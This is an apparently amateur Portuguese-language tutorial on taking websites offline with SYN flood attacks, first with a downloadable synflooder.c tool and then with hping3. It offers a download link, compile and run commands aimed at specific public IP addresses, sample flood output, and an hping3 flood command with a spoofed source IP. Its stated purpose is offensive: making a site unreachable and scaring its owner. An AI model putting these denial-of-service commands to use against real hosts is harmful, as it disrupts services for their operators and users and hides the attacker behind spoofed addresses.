Introdução ao ataque com synflooder.c
Iae galera, vou demostrar como retirar um site/host  do ar por ataque SYN Flood pra derrubar sites (hosts), quem não conhece muito SYN Flood, recomendo que leia mais sobre o mesmo.
Eu usarei 2 metodos para realizar o ataque, um será  usando a ferramenta synflooder.c outro sera usando o hping3
Você pode baixar o hping no link abaixo:
synflooder.c —> http://www.4shared.com/file/119205535/bd36c580/SYN_Floodertar.html
hping —> http://www.hping.org/download.html
Obs: Para quem usa Debian, é muito fácil de instalar basta digitar:
# apt-get install hping3
Para quem usa OpenSUSE basta digitar:
# yast install hping3
Para quem usa Fedora basta digitar:
# yum install hping3
——————————————————————————————-
Agora o primeiro passo para realizar o ataque com o synflooder.c é compila-lo:
# gcc  synflooder.c -o synflooder
Obs: geralmente as pessoas reclaman de dar erro na compilação, uns merda… Pois, basta pegar algumas biblilhotecas que estarão faltando em alguns casos.
# ./synflooder
Gimme: ./synflooder <host> <port>
# ./synflooder 189.23.199.200 80
Connected No: 0
Connected No: 1
Connected No: 2
Connected No: 3
Connected No: 4
Connected No: 5
Connected No: 6
Connected No: 7
Connected No: 8
Connected No: 9
Connected No: 10
Connected No: 11
Connected No: 12
Connected No: 13
Connected No: 14
Connected No: 15
Connected No: 16
Depois de um tempo o site ficara impossibilitado de receber mais conexões e qualquer pessoa que tentar entrar no site, simplesmente não ira conseguir.
Obs: na minha opniao este ataque serve somente para passar medo em alguma pessoa, pois o servidor so fica fora do ar por alguns minutinhos básicos.
———————————————————————————————
ataque com HPING3
O hping3 é um programa muito util, pode ser usado para manipular o cabeçalho TCP/IP. Sera exatamente isto que vamos fazer, primeiro vamos spoofar o IP e floodar o alvo.
Atacando
O comando usado sera este:
hping3 –flood –syn -a ip_falso -e “Message” -S -s porta ip_alvo
Então no konsole vamos fazer assim:
#hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164
O resultado sera que o alvo ira ficar OFF:
# hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164
HPING 201.40.22.164  (ppp0 201.40.22.164): S set, 40 headers + 16 data bytes
[main] memlockall(): Success
Warning: can’t disable memory paging!
hping in flood mode, no replies will be shown
———————————————————————————————–
Espero que tenham gostado do tutorial.